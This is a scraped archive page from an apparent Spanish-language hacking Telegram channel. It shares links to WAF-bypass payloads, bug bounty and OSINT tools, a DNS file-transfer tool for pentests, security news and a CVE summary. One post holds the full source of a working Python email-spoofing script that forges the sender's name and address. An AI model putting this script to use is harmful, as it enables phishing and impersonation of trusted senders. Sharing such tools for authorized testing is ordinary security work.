en
Feedback
ӉѦСҠіИԌ ҬЄѦӍ СѦИѦL ѺҒіСіѦL DіҒԱՏіóИ

ӉѦСҠіИԌ ҬЄѦӍ СѦИѦL ѺҒіСіѦL DіҒԱՏіóИ

Closed channel

Cana Oficial del grupo Hacking Team

Show more
1 781
Subscribers
No data24 hours
No data7 days
No data30 days
Posts Archive
Waf-Bypass: comprueba tu WAF antes de que lo haga un atacante LFI -Local File MFD -multipart/form-data NoSQLi OR -Open Redire
Waf-Bypass: comprueba tu WAF antes de que lo haga un atacante LFI -Local File MFD -multipart/form-data NoSQLi OR -Open Redirect RCE -Remote Code Execution RFI -Remote File Inclusion SQLi SSI -Server-Side Includes SSRF -Server-side request forgery XSS https://github.com/nemesida-waf/waf-bypass

AWESOME BUGBOUNTY TOOLS Subdomain Enumeration Port Scanning Fuzzing GraphQL/CRLF/CSRF/SQL/XSS/XXE Injections Directory Traversal Open Redirect Subdomain Takeover and more. https://github.com/vavkamil/awesome-bugbounty-tools

¿HACKING VIAJE?   1. Desarrollar una sólida comprensión de la programación informática y los principios de desarrollo de software. Conozca varios lenguajes, como Python, Ruby, JavaScript, Swift y C++.    2. Desarrolle una fuerte mentalidad de seguridad. Comprender los conceptos de seguridad comunes, como la autenticación, el cifrado, el control de acceso a la red y los firewalls.    3. Explora proyectos de código abierto. Hay numerosos proyectos por ahí, así que encuentra lo que te interesa y dedica tanto tiempo y esfuerzo como puedas.    4. Utilice la automatización siempre que sea posible. La automatización de tareas mundanas puede ahorrarle tiempo y energía para que pueda concentrarse en los aspectos más importantes de su proyecto.    5. Manténgase actualizado sobre las noticias de seguridad. Lea e investigue, pero también asista a conferencias de hackers y sea un participante activo en la comunidad.    6. Contribuir a la comunidad de seguridad. Enfréntate a programas de recompensas por errores, desarrolle algo nuevo que otros puedan usar, escriba un artículo o tutorial, o simplemente retribuya de otra manera.    7. Mantente siempre curioso. Una mentalidad inquisitiva lo mantendrá resistente y capaz de adaptarse a nuevas situaciones.     COMUNIDAD HACKING TEAM

Hackers Using Trojanized macOS Apps to Deploy Evasive Cryptocurrency Mining Malware https://thehackernews.com/2023/02/hackers-using-trojanized-macos-apps-to.html

Phylum Discovers Aggressive Attack on PyPI Attempting to Deliver Rust Executable https://blog.phylum.io/phylum-discovers-another-attack-on-pypi

Chatdoctor ChatDoctor es un modelo de una nueva generación de inteligencia artificial, basada en el modelo de llama. El propósito de este proyecto es proporcionar a los pacientes un asistente intelectual y confiable en el campo de la atención médica, que puede responder sus preguntas médicas y proporcionarles consultas médicas personalizadas. Se sometió a capacitación en un gran cuerpo de literatura médica y tiene una comprensión profunda de la terminología médica, los procedimientos y los diagnósticos. Los pacientes pueden interactuar con el modelo ChatDoctor a través de la interfaz de chat, hacer preguntas sobre su salud, síntomas o enfermedades.Luego, el modelo analizará la entrada y proporcionará una respuesta, adaptada a la situación única del paciente. https://github.com/kent0n-li/chatdoctor Arxiv: https://arxiv.org/abs/2303.14070

1. Elevation of Privilege from Local Admin to gMSA https://aadinternals.com/post/local_admin_to_gmsa 2. Keeping LSA secrets out of physical memory https://github.com/elastic/Silhouette 3. Basic SSTI - Server-Side Template Injection (2023) https://infosecwriteups.com/basic-ssti-server-side-template-injection-2023-da4995583554

⚡️150+ Best Osint And Soucing Tools In the World⚡️ 🔹Scraping, Parsing, Filtering, and Sorting contact data Creating content with AI Social Media Lookup & Monitoring Contact Verification Company Research and Datasets and more. ♻️Tools - https://booleanstrings.com/tools/

+3
Python for Hackers - Bootcamp (3).pdf9.15 KB

#Email spoofing script.py source : import smtplib from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart from email.mime.base import MIMEBase from email import encoders import traceback import configparser config = configparser.ConfigParser() config.read('config.ini') def send_mail(receiver_email, spoofed_email, spoofed_name, message, subject): try: msg = MIMEMultipart("related") msg['From'] = f"{spoofed_name} <{spoofed_email}>" msg['To'] = receiver_email msg['Subject'] = subject body = message msg.attach(MIMEText(body, 'plain')) # Get SMTP settings from config file smtp_host = config.get('SMTP', 'host') smtp_port = config.getint('SMTP', 'port') smtp_username = config.get('SMTP', 'username') smtp_password = config.get('SMTP', 'password') # Connect to SMTP server and send email server = smtplib.SMTP(smtp_host, smtp_port) server.starttls() server.login(smtp_username, smtp_password) text = msg.as_string() server.sendmail(spoofed_email, receiver_email, text) server.quit() print('Spoofed Email sent successfully to '+ str(receiver_email) + ' from ' + str(spoofed_name)) except Exception as e: # Print the exception print(traceback.format_exc()) receiver_email = '<Receivers Email Address>' spoofed_email = '<Spoofed Email Address>' spoofed_name = '<Spoofed Name>' message = '<Text Message to send>' subject = '<Email Subject/Title>' # Invoke send_mail to send email send_mail(receiver_email,spoofed_email,spoofed_name, message, subject)

Have you ever wanted to transfer files over DNS A records? No? Well too bad lol, I've updated @domchell's PowerDNS to do that along with some other things. Could be useful for pentests with no standard outbound access... which yes I get quite a bit of. https://github.com/icyguider/NewPowerDNS #DNS @NetPentesters

Hacker ha publicado recientemente un vídeo de demostración en el que muestra cómo se salta la autenticación de dos factores de Telegram, lo que supone una grave amenaza para los usuarios. Esto significa que se puede acceder a tu cuenta incluso si configuras el 2FA y adjuntas tu correo electrónico.

📣🌡 🟧 CVE-2023-21005 ➡️ android 🆕 2023.3.24 🔄 2023.3.29 In getAvailabilityStatus of several Transcode Permission Controllers, there is a possible permission bypass due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-261193946 📖 read more nist.gov 📖 read more cve.org